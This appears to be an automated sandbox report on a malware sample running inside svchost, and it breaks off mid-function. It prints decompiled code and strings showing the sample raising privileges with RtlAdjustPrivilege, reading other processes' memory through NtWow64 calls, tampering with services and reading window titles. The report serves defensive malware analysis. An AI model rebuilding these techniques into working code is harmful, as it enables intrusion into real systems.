                                                            • Instruction ID: 5a8cf412ae841d89e372cbe0c8d602f41c48432933fffd58544c14aaabf4d31f
                                                            • Opcode Fuzzy Hash: 3ff7a732dab860e9fcb318fc0cd7c1670d7b86a6265b15641296e67d8a6d4be5
                                                            • Instruction Fuzzy Hash: ED41D1736246809AE6228B7AA45C75AF7A4FBC9BD4F108321E94553B1DEF7DC4868F00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 53%
                                                            			E0000022B22BAF548850(void* __ebx, long long __rbx, void* __rcx, signed long long* __rdx, long long __rdi, long long _a24, long long _a32) {
                                                            				signed int _v40;
                                                            				char _v1064;
                                                            				char _v2088;
                                                            				void* __rsi;
                                                            				int _t30;
                                                            				void* _t36;
                                                            				void* _t44;
                                                            				void* _t45;
                                                            				void* _t46;
                                                            				signed long long _t52;
                                                            				signed long long _t53;
                                                            				void* _t56;
                                                            				long long _t80;
                                                            				signed long long _t86;
                                                            				signed long long _t88;
                                                            				void* _t89;
                                                            
                                                            				_t80 = __rdi;
                                                            				_t52 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t53 = _t52 ^ _t88;
                                                            				_v40 = _t53;
                                                            				r8d = 0x400;
                                                            				E0000022B22BAF563830(_t36, 0, _t44, _t46,  &_v1064, __rdx, __rdi, _t89);
                                                            				r8d = 0x400;
                                                            				E0000022B22BAF563830(_t36, 0, _t44, _t46,  &_v2088, __rdx, _t80, _t89);
                                                            				r8d = 0x3ff;
                                                            				GetClassNameA(??, ??, ??);
                                                            				if (lstrlenA(??) == 0) goto 0xaf5489a0;
                                                            				if (E0000022B22BAF57A020(_t36, 0,  &_v2088, "5B3838F5-0C81-46D9-A4C0-6EA28CA3E942") != 0) goto 0xaf5489a0;
                                                            				r8d = 0x3ff;
                                                            				_a32 = _t80;
                                                            				GetWindowTextA(??, ??, ??);
                                                            				strrchr(??, ??);
                                                            				if (_t53 == 0) goto 0xaf548995;
                                                            				_a24 = __rbx;
                                                            				if ( *__rdx != 0) goto 0xaf548936;
                                                            				LocalAlloc(??, ??);
                                                            				LocalSize(??);
                                                            				lstrlenA(??);
                                                            				r8d = 0x42;
                                                            				LocalReAlloc(??, ??, ??);
                                                            				_t56 = _t53 + _t53;
                                                            				_t86 = _t53;
                                                            				GetWindowThreadProcessId(??, ??);
                                                            				_t30 = lstrlenA(??);
                                                            				_t14 = _t56 + 4; // 0x4
                                                            				E0000022B22BAF562BA0( *__rdx + 0x40, _t44, _t45, _t46, _t14, _t53 + 1, _t53 + 1, _t86, _t30 + 1);
                                                            				 *__rdx = _t86;
                                                            				return E0000022B22BAF55A7C0( *__rdx + 0x40, _t53, _v40 ^ _t88);
                                                            			}



















                                                            0x22baf548850
                                                            0x22baf54885c
                                                            0x22baf548863
                                                            0x22baf548866
                                                            0x22baf548881
                                                            0x22baf548887
                                                            0x22baf548893
                                                            0x22baf548899
                                                            0x22baf54889e
                                                            0x22baf5488ac
                                                            0x22baf5488bf
                                                            0x22baf5488d8
                                                            0x22baf5488de
                                                            0x22baf5488e4
                                                            0x22baf5488f7
                                                            0x22baf54890a
                                                            0x22baf548915
                                                            0x22baf54891a
                                                            0x22baf548925
                                                            0x22baf54892d
                                                            0x22baf548939
                                                            0x22baf548945
                                                            0x22baf54894b
                                                            0x22baf548959
                                                            0x22baf548964
                                                            0x22baf548967
                                                            0x22baf54896d
                                                            0x22baf548976
                                                            0x22baf54897c
                                                            0x22baf548988
                                                            0x22baf54899d
                                                            0x22baf5489bd

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Locallstrlen$AllocWindow$ClassNameProcessSizeTextThreadstrrchr
                                                            • String ID: 5B3838F5-0C81-46D9-A4C0-6EA28CA3E942
                                                            • API String ID: 2497764485-3141347713
                                                            • Opcode ID: b2262892ffc972409063152210c879be32e342e92ed0c60b8a876b92dd153c6e
                                                            • Instruction ID: f1fd72ae941e5c3373e0f87aca1057a25cd4813584b25cb8c4d462753d697c4c
                                                            • Opcode Fuzzy Hash: b2262892ffc972409063152210c879be32e342e92ed0c60b8a876b92dd153c6e
                                                            • Instruction Fuzzy Hash: 16316562710A85A5EE75EF92E85C3DA7391FB89BC5F444021CE4A47B5ADF3EC106CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close$CreateDeleteOpen
                                                            • String ID: SOFTWARE\Classes\.codein
                                                            • API String ID: 2517957394-3041101089
                                                            • Opcode ID: d51038d41aa24ffffb5a092243cc8de26b92506cbc57dae87f72e5684ffde561
                                                            • Instruction ID: aaae828e3e3dcf7765b4764b974b347c55277410019499d6a5e77eee526b36ba
                                                            • Opcode Fuzzy Hash: d51038d41aa24ffffb5a092243cc8de26b92506cbc57dae87f72e5684ffde561
                                                            • Instruction Fuzzy Hash: CC415077204B01E2EB218F95F89C78A7BA4F784794F440615EA9D43B69DF3ED189CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 46%
                                                            			E0000022B22BAF545F4B(void* __rax, long long __rbx, long long _a288) {
                                                            				int _t5;
                                                            				void* _t9;
                                                            				void* _t16;
                                                            				void* _t21;
                                                            				void* _t23;
                                                            				void* _t30;
                                                            				void* _t31;
                                                            				void* _t32;
                                                            
                                                            				_t9 = __rax;
                                                            				_pop(_t21);
                                                            				goto 0xaf546b40;
                                                            				_a288 = __rbx;
                                                            				E0000022B22BAF545FD0(_t16, _t21, _t23, _t30, _t31, _t32);
                                                            				if (_t9 == 0) goto 0xaf545fa9;
                                                            				_t5 = LocalSize(??);
                                                            				r9b = 0x3f;
                                                            				r8d = _t5;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t21 + 8)), _t9);
                                                            				return LocalFree(??);
                                                            			}











                                                            0x22baf545f4b
                                                            0x22baf545f6d
                                                            0x22baf545f6e
                                                            0x22baf545f73
                                                            0x22baf545f78
                                                            0x22baf545f83
                                                            0x22baf545f88
                                                            0x22baf545f92
                                                            0x22baf545f95
                                                            0x22baf545f9b
                                                            0x22baf545fb3

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseDeleteHandleOpen$ControlManagerQuerySleepStatuswsprintf
                                                            • String ID: SYSTEM\CurrentControlSet\Services\%s
                                                            • API String ID: 3594024867-2757632955
                                                            • Opcode ID: 2b219ea6b56369f2154be6a0a472141b7a200e0bcbb87126cbeb6a65f44bcbe9
                                                            • Instruction ID: 20a0c3f21332c96ffa8dc0524c37fcb302efe79f45e88227b0d11c80813712b6
                                                            • Opcode Fuzzy Hash: 2b219ea6b56369f2154be6a0a472141b7a200e0bcbb87126cbeb6a65f44bcbe9
                                                            • Instruction Fuzzy Hash: F931A032704A44A2FF369BA2E85C3EAB3A1FB88B85F044125CD5D0779ADF3EC5058B40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 33%
                                                            			E0000022B22BAF5369C0(intOrPtr* __rcx, void* __rdx, long long __rsi, void* __r9, long long __r14) {
                                                            				void* __rbx;
                                                            				void* __rdi;
                                                            				void* _t90;
                                                            				void* _t91;
                                                            				void* _t106;
                                                            				signed long long _t108;
                                                            				signed long long _t109;
                                                            				long long _t112;
                                                            				intOrPtr* _t113;
                                                            				intOrPtr* _t116;
                                                            				signed long long _t151;
                                                            				intOrPtr* _t156;
                                                            				void* _t158;
                                                            				void* _t159;
                                                            				signed long long _t160;
                                                            				long long _t172;
                                                            				signed long long _t175;
                                                            
                                                            				_t158 = _t159 - 0x730;
                                                            				_t160 = _t159 - 0x830;
                                                            				_t108 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t109 = _t108 ^ _t160;
                                                            				 *(_t158 + 0x720) = _t109;
                                                            				_t116 = __rcx;
                                                            				GetModuleHandleA(??);
                                                            				r12d = 0;
                                                            				if (_t109 != 0) goto 0xaf536a1a;
                                                            				LoadLibraryA(??);
                                                            				if (_t109 != 0) goto 0xaf536a1a;
                                                            				goto 0xaf536a2d;
                                                            				GetProcAddress(??, ??);
                                                            				_t151 = _t109;
                                                            				 *((long long*)(_t160 + 0x878)) = __r14;
                                                            				GetModuleHandleA(??);
                                                            				if (_t109 != 0) goto 0xaf536a5e;
                                                            				LoadLibraryA(??);
                                                            				if (_t109 != 0) goto 0xaf536a5e;
                                                            				goto 0xaf536a71;
                                                            				GetProcAddress(??, ??);
                                                            				_t175 = _t109;
                                                            				if (_t151 == 0) goto 0xaf536c89;
                                                            				if (_t175 == 0) goto 0xaf536c89;
                                                            				 *((long long*)(_t160 + 0x30)) = _t172;
                                                            				 *(_t160 + 0x38) = _t109;
                                                            				 *(_t160 + 0x40) = _t109;
                                                            				r9d = 0x30;
                                                            				 *(_t160 + 0x48) = _t109;
                                                            				 *(_t160 + 0x50) = _t109;
                                                            				 *(_t160 + 0x58) = _t109;
                                                            				 *(_t160 + 0x60) = _t109;
                                                            				 *((long long*)(_t160 + 0x20)) = _t160 + 0x30;
                                                            				 *_t151();
                                                            				if (0 < 0) goto 0xaf536c89;
                                                            				if ( *((long long*)(_t160 + 0x30)) != 0x30) goto 0xaf536c89;
                                                            				r9d = 0x388;
                                                            				 *((long long*)(_t160 + 0x20)) = _t160 + 0x30;
                                                            				 *_t175();
                                                            				if (0 < 0) goto 0xaf536c89;
                                                            				if ( *((long long*)(_t160 + 0x30)) != 0x388) goto 0xaf536c89;
                                                            				_t112 = _t160 + 0x30;
                                                            				r9d = 0x3f8;
                                                            				 *((long long*)(_t160 + 0x20)) = _t112;
                                                            				 *_t175();
                                                            				if (0 < 0) goto 0xaf536c89;
                                                            				if ( *((long long*)(_t160 + 0x30)) != 0x3f8) goto 0xaf536c89;
                                                            				 *((long long*)(_t160 + 0x870)) = __rsi;
                                                            				_t113 =  <  ? 0xffffffff : _t112;
                                                            				E0000022B22BAF55A828(2 * (__rdx + 1) >> 0x20, _t113);
                                                            				r8d =  *(_t158 - 0x20) & 0x0000ffff;
                                                            				_t156 = _t113;
                                                            				E0000022B22BAF563830( *(_t158 - 0x20) & 0x0000ffff, 0, r12d, _t91, _t113,  *((intOrPtr*)(_t158 + 0x390)), 0xffffffff, 2 + (_t160 + 0x70) * 2);
                                                            				r9d =  *(_t158 - 0x20) & 0x0000ffff;
                                                            				 *((long long*)(_t160 + 0x20)) = _t160 + 0x30;
                                                            				 *_t175();
                                                            				 *((long long*)(_t158 + 0x718)) = 7;
                                                            				 *((long long*)(_t158 + 0x710)) = _t172;
                                                            				 *((intOrPtr*)(_t158 + 0x700)) = r12w;
                                                            				if ( *_t156 != r12w) goto 0xaf536bd0;
                                                            				goto 0xaf536bda;
                                                            				if ( *((intOrPtr*)(_t156 + (_t172 + 1) * 2)) != r12w) goto 0xaf536bd0;
                                                            				E0000022B22BAF533B50(_t116, _t158 + 0x700, _t156, _t156, _t172 + 1);
                                                            				E0000022B22BAF55A7E4(_t160 + 0x30, _t156);
                                                            				 *((long long*)(_t116 + 0x18)) = 7;
                                                            				 *((long long*)(_t116 + 0x10)) = _t172;
                                                            				 *_t116 = r12w;
                                                            				_t106 =  *((intOrPtr*)(_t158 + 0x718)) - 8;
                                                            				if (_t106 >= 0) goto 0xaf536c41;
                                                            				if (_t106 == 0) goto 0xaf536c52;
                                                            				E0000022B22BAF562BA0( *(_t158 - 0x20) & 0x0000ffff, r12d, _t90, _t91, _t116, _t158 + 0x700, _t172 + 1,  *((intOrPtr*)(_t160 + 0x870)),  *((intOrPtr*)(_t158 + 0x710)) + 1 +  *((intOrPtr*)(_t158 + 0x710)) + 1);
                                                            				goto 0xaf536c52;
                                                            				 *_t116 =  *((intOrPtr*)(_t158 + 0x700));
                                                            				 *((long long*)(_t158 + 0x700)) = _t172;
                                                            				 *((long long*)(_t116 + 0x10)) =  *((intOrPtr*)(_t158 + 0x710));
                                                            				 *((long long*)(_t116 + 0x18)) =  *((intOrPtr*)(_t158 + 0x718));
                                                            				 *((long long*)(_t158 + 0x718)) = 7;
                                                            				 *((long long*)(_t158 + 0x710)) = _t172;
                                                            				 *((intOrPtr*)(_t158 + 0x700)) = r12w;
                                                            				E0000022B22BAF5339E0( *(_t158 - 0x20) & 0x0000ffff, _t158 + 0x700);
                                                            				goto 0xaf536cab;
                                                            				 *((long long*)(_t116 + 0x18)) = 7;
                                                            				 *((long long*)(_t116 + 0x10)) = _t172;
                                                            				r8d = 0;
                                                            				 *_t116 = r12w;
                                                            				E0000022B22BAF533B50(_t116, _t116, 0xaf586058,  *((intOrPtr*)(_t160 + 0x870)),  *((intOrPtr*)(_t158 + 0x710)) + 1 +  *((intOrPtr*)(_t158 + 0x710)) + 1);
                                                            				return E0000022B22BAF55A7C0( *(_t158 - 0x20) & 0x0000ffff, _t116,  *(_t158 + 0x720) ^ _t160);
                                                            			}




















                                                            0x22baf5369c8
                                                            0x22baf5369d0
                                                            0x22baf5369d7
                                                            0x22baf5369de
                                                            0x22baf5369e1
                                                            0x22baf5369e8
                                                            0x22baf5369f5
                                                            0x22baf5369fb
                                                            0x22baf536a01
                                                            0x22baf536a0a
                                                            0x22baf536a13
                                                            0x22baf536a18
                                                            0x22baf536a24
                                                            0x22baf536a2a
                                                            0x22baf536a34
                                                            0x22baf536a3c
                                                            0x22baf536a45
                                                            0x22baf536a4e
                                                            0x22baf536a57
                                                            0x22baf536a5c
                                                            0x22baf536a68
                                                            0x22baf536a6e
                                                            0x22baf536a74
                                                            0x22baf536a7d
                                                            0x22baf536a85
                                                            0x22baf536a8a
                                                            0x22baf536a94
                                                            0x22baf536a99
                                                            0x22baf536a9f
                                                            0x22baf536aa6
                                                            0x22baf536aae
                                                            0x22baf536ab3
                                                            0x22baf536abd
                                                            0x22baf536ac2
                                                            0x22baf536ac6
                                                            0x22baf536ad2
                                                            0x22baf536ae2
                                                            0x22baf536ae8
                                                            0x22baf536af7
                                                            0x22baf536afc
                                                            0x22baf536b0b
                                                            0x22baf536b18
                                                            0x22baf536b1d
                                                            0x22baf536b23
                                                            0x22baf536b30
                                                            0x22baf536b35
                                                            0x22baf536b44
                                                            0x22baf536b56
                                                            0x22baf536b68
                                                            0x22baf536b6f
                                                            0x22baf536b74
                                                            0x22baf536b7e
                                                            0x22baf536b89
                                                            0x22baf536b8e
                                                            0x22baf536ba2
                                                            0x22baf536ba7
                                                            0x22baf536baa
                                                            0x22baf536bb5
                                                            0x22baf536bbc
                                                            0x22baf536bc8
                                                            0x22baf536bcd
                                                            0x22baf536bd8
                                                            0x22baf536be7
                                                            0x22baf536bef
                                                            0x22baf536bfc
                                                            0x22baf536c04
                                                            0x22baf536c08
                                                            0x22baf536c13
                                                            0x22baf536c17
                                                            0x22baf536c24
                                                            0x22baf536c33
                                                            0x22baf536c3f
                                                            0x22baf536c48
                                                            0x22baf536c4b
                                                            0x22baf536c59
                                                            0x22baf536c64
                                                            0x22baf536c68
                                                            0x22baf536c73
                                                            0x22baf536c7a
                                                            0x22baf536c82
                                                            0x22baf536c87
                                                            0x22baf536c89
                                                            0x22baf536c98
                                                            0x22baf536c9c
                                                            0x22baf536ca2
                                                            0x22baf536ca6
                                                            0x22baf536cd3

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                            • String ID: 0$NtWow64QueryInformationProcess64$NtWow64ReadVirtualMemory64$ntdll.dll
                                                            • API String ID: 310444273-3583746680
                                                            • Opcode ID: 9f4c9a20cd58477a0b8681746b0ded6acf4622161b753e07d396b435625f0707
                                                            • Instruction ID: 71729ddf5b6573295294119e01927eced3bc9df0e66e538c85696c5957219e51
                                                            • Opcode Fuzzy Hash: 9f4c9a20cd58477a0b8681746b0ded6acf4622161b753e07d396b435625f0707
                                                            • Instruction Fuzzy Hash: CB817D23615B84D5EB728FA5E86C7D973A4FB44B88F404219DA9D07B8ADF3EC200C780
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Sleep$Local$AllocCreateEventFreeObjectSingleWait
                                                            • String ID: c$d$~
                                                            • API String ID: 824083382-1047207048
                                                            • Opcode ID: 87679f1f6eac7ddf4ba7d1ccb3e66183ab8783ea083e9ca94fa837566ebf0fc3
                                                            • Instruction ID: 4a741cf7397b528fa4759497a96d5cef8eb543376b34aa317947ca965c5d830c
                                                            • Opcode Fuzzy Hash: 87679f1f6eac7ddf4ba7d1ccb3e66183ab8783ea083e9ca94fa837566ebf0fc3
                                                            • Instruction Fuzzy Hash: 1C51DF37305B88A6EB268F99E8AC3ED77A1F385B81F444515CE4A07366CF7AC884C750
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad
                                                            • String ID: SetProcessDPIAware$SetProcessDpiAwareness$SetProcessDpiAwarenessContext$Shcore.dll$User32.dll
                                                            • API String ID: 2238633743-2252252969
                                                            • Opcode ID: 6fb07f784bf1300ce02173238751f06859fc4310715d01e3aa513480e5ea284b
                                                            • Instruction ID: ba11a67416fe43bc9474787acfaacb66b69ec4b97145d76e4754b3339029f5eb
                                                            • Opcode Fuzzy Hash: 6fb07f784bf1300ce02173238751f06859fc4310715d01e3aa513480e5ea284b
                                                            • Instruction Fuzzy Hash: 7701ED53B02701B1FE779BD9B8AC3E53390AF457A0F8846288D2D463E6FF3AD5858250
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0000022B22BAF55AEDC(void* __edx) {
                                                            				void* _t5;
                                                            
                                                            				_t5 = __edx;
                                                            				if (_t5 == 0) goto 0xaf55af1d;
                                                            				if (_t5 == 0) goto 0xaf55af11;
                                                            				if (_t5 == 0) goto 0xaf55af04;
                                                            				if (__edx == 1) goto 0xaf55aefd;
                                                            				return 1;
                                                            			}




                                                            0x22baf55aee0
                                                            0x22baf55aee2
                                                            0x22baf55aee7
                                                            0x22baf55aeec
                                                            0x22baf55aef1
                                                            0x22baf55aefc

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                                                            • String ID:
                                                            • API String ID: 4221786481-0
                                                            • Opcode ID: d13e06c18f5592721c8b6f5b4342ebe07dca7d90977a2cf645a194f5eec25d56
                                                            • Instruction ID: aa179a1fd4d7251c8caaede286655137d282e61f7cee0714b786a9ecdbd0b206
                                                            • Opcode Fuzzy Hash: d13e06c18f5592721c8b6f5b4342ebe07dca7d90977a2cf645a194f5eec25d56
                                                            • Instruction Fuzzy Hash: 1351C263604241B6FA3BABE5A98E3DD37A0EB85380F844415AA49477E7DF3FC546C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$EnterLeave
                                                            • String ID:
                                                            • API String ID: 2124651672-0
                                                            • Opcode ID: fa4ffa5d86a2f893e9271250c461d635a5905b4895f717afca3ed6017ffe68fd
                                                            • Instruction ID: 2a82c747203447ad3728cf167bfe6b79f2c806db9938da7ba37bce7fbfaaaecc
                                                            • Opcode Fuzzy Hash: fa4ffa5d86a2f893e9271250c461d635a5905b4895f717afca3ed6017ffe68fd
                                                            • Instruction Fuzzy Hash: 4141C037201644E7EB62DFA0D08CA9D77B6F788794F460511CE6A83796DF3AC445CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$Initialize$DescriptorFreeProcessSecurity$AccessAllocAllocateAllowedDaclLength
                                                            • String ID:
                                                            • API String ID: 1313825231-0
                                                            • Opcode ID: e57bf40501bcbdd38591dfe3bb83acb5636c22dcc319288e39fd584354930e7c
                                                            • Instruction ID: 0abe102b51fe9c861f0c8c45e578f57b4901b1420816fc449a221469d98c6a0a
                                                            • Opcode Fuzzy Hash: e57bf40501bcbdd38591dfe3bb83acb5636c22dcc319288e39fd584354930e7c
                                                            • Instruction Fuzzy Hash: B2415D33204785A7EB21CF92A85C79AB7A5FB88BD0F0445249E8957B29DF3EC446CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E0000022B22BAF53B9F0(void* __ecx, void* __eflags, long long __rbx, void* __rdx, long long __rdi, void* __rsi, void* __r8) {
                                                            				void* _t43;
                                                            				signed long long _t52;
                                                            				long long _t71;
                                                            				void* _t74;
                                                            				signed int* _t75;
                                                            				void* _t77;
                                                            				signed long long _t78;
                                                            
                                                            				_t71 = __rdi;
                                                            				_t43 = __ecx;
                                                            				 *((long long*)(_t77 + 0x18)) = __rbx;
                                                            				_t75 = _t77 - 0x10;
                                                            				_t78 = _t77 - 0x110;
                                                            				_t52 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *_t75 = _t52 ^ _t78;
                                                            				 *((long long*)(_t78 + 0x128)) = __rdi;
                                                            				E0000022B22BAF538B60(_t52 ^ _t78, __rbx, _t78 + 0x50, __rdi, __rsi);
                                                            				 *((char*)(_t75 - 0x40)) = 0x43;
                                                            				 *((long long*)(_t75 - 0x60)) = _t71;
                                                            				 *((long long*)(_t75 - 0x68)) = 0xaf588810;
                                                            				 *((long long*)(_t75 - 0x50)) = _t71;
                                                            				 *((long long*)(_t75 - 0x58)) = 0xaf5887c8;
                                                            				 *((intOrPtr*)(_t75 - 0x18)) = 0;
                                                            				 *((long long*)(_t75 - 0x28)) = _t71;
                                                            				 *((long long*)(_t75 - 0x20)) = _t71;
                                                            				 *((intOrPtr*)(_t75 - 0x3c)) = 0;
                                                            				 *((long long*)(_t75 - 0x78)) = _t71;
                                                            				 *((long long*)(_t75 - 0x70)) = _t71;
                                                            				 *((long long*)(_t75 - 0x48)) = _t71;
                                                            				E0000022B22BAF53A030();
                                                            				r8d =  *0xaf5958f0 & 0x0000ffff;
                                                            				 *((long long*)(_t75 - 0x38)) = _t71;
                                                            				if (( *(_t75 - 0x10) & 0x0000ffff) != 1) goto 0xaf53bb24;
                                                            				 *((short*)(_t78 + 0x28)) = 0;
                                                            				r9d = 0;
                                                            				 *((long long*)(_t78 + 0x20)) = _t71;
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t75 - 0x78))))))(_t74) != 0) goto 0xaf53bb8d;
                                                            				E0000022B22BAF53A220( *0xaf599c28 & 0xffff, _t78 + 0x50);
                                                            				if ( *((intOrPtr*)(_t75 - 0x28)) == 0) goto 0xaf53bace;
                                                            				E0000022B22BAF55A7E4( *((intOrPtr*)( *((intOrPtr*)(_t75 - 0x78)))),  *((intOrPtr*)(_t75 - 0x28)));
                                                            				 *((long long*)(_t75 - 0x58)) = 0xaf588690;
                                                            				 *((intOrPtr*)(_t75 - 0x18)) = 0;
                                                            				 *((long long*)(_t75 - 0x28)) = _t71;
                                                            				 *((long long*)(_t75 - 0x20)) = _t71;
                                                            				 *((long long*)(_t75 - 0x68)) = 0xaf588790;
                                                            				if ( *((intOrPtr*)(_t75 - 0x80)) == 0) goto 0xaf53bb05;
                                                            				E0000022B22BAF55A7E4(0xaf588790,  *((intOrPtr*)(_t75 - 0x80)));
                                                            				return E0000022B22BAF55A7C0(_t43, 0xaf588790,  *_t75 ^ _t78);
                                                            			}










                                                            0x22baf53b9f0
                                                            0x22baf53b9f0
                                                            0x22baf53b9f0
                                                            0x22baf53b9f6
                                                            0x22baf53b9fb
                                                            0x22baf53ba02
                                                            0x22baf53ba0c
                                                            0x22baf53ba1c
                                                            0x22baf53ba24
                                                            0x22baf53ba2b
                                                            0x22baf53ba36
                                                            0x22baf53ba3a
                                                            0x22baf53ba4a
                                                            0x22baf53ba51
                                                            0x22baf53ba55
                                                            0x22baf53ba58
                                                            0x22baf53ba5c
                                                            0x22baf53ba60
                                                            0x22baf53ba63
                                                            0x22baf53ba67
                                                            0x22baf53ba6b
                                                            0x22baf53ba6f
                                                            0x22baf53ba78
                                                            0x22baf53ba80
                                                            0x22baf53ba88
                                                            0x22baf53ba99
                                                            0x22baf53ba9e
                                                            0x22baf53baa1
                                                            0x22baf53baad
                                                            0x22baf53babb
                                                            0x22baf53bac7
                                                            0x22baf53bac9
                                                            0x22baf53bad9
                                                            0x22baf53bae4
                                                            0x22baf53bae7
                                                            0x22baf53baeb
                                                            0x22baf53baf7
                                                            0x22baf53bafe
                                                            0x22baf53bb00
                                                            0x22baf53bb23

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoadLocal$CloseCreateEventFreeHandleSizeSleep
                                                            • String ID: RtlAdjustPrivilege$ntdll.dll
                                                            • API String ID: 3641538898-64178277
                                                            • Opcode ID: 6b788b816d507ef0145bb2fe1a46bbcf9ffa9ae8f76f4aac0dcbea393d98246e
                                                            • Instruction ID: 83c4b2ed4284eec5db36808bef34f5d3c5e8ebd0dc29cd8aac29d05c31190134
                                                            • Opcode Fuzzy Hash: 6b788b816d507ef0145bb2fe1a46bbcf9ffa9ae8f76f4aac0dcbea393d98246e
                                                            • Instruction Fuzzy Hash: 0D716B33611B44A5EB22DFA4E8AC3DD73B4FB84798F100116DA8943B6ADF3AC145C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 65%
                                                            			E0000022B22BAF547A60(signed long long __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, long long __r12, signed int __r15, long long _a24, long long _a32) {
                                                            				long long _v24;
                                                            				long long _v32;
                                                            				long long _v40;
                                                            				signed int _v56;
                                                            				void* _v584;
                                                            				short _v596;
                                                            				short _v600;
                                                            				void* _t37;
                                                            				void* _t45;
                                                            				signed int _t57;
                                                            				void* _t63;
                                                            				void* _t75;
                                                            				void* _t77;
                                                            				signed long long _t88;
                                                            				signed long long _t89;
                                                            				signed short* _t90;
                                                            				signed long long _t92;
                                                            				signed short* _t93;
                                                            				long long _t120;
                                                            				signed short* _t127;
                                                            				signed long long _t129;
                                                            				void* _t130;
                                                            
                                                            				_t120 = __rdi;
                                                            				_t88 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t89 = _t88 ^ _t129;
                                                            				_v56 = _t89;
                                                            				_t92 = __rcx;
                                                            				r8d = 0x208;
                                                            				E0000022B22BAF563830(_t63, 0, _t75, _t77, __rdx, __rdx, __rdi, _t130);
                                                            				r8d = 0x208;
                                                            				_t37 = E0000022B22BAF563830(_t63, 0, _t75, _t77,  &_v584, __rdx, _t120, _t130);
                                                            				r8d = 0x104;
                                                            				__imp__GetProcessImageFileNameW();
                                                            				if (_t37 == 0) goto 0xaf547c6f;
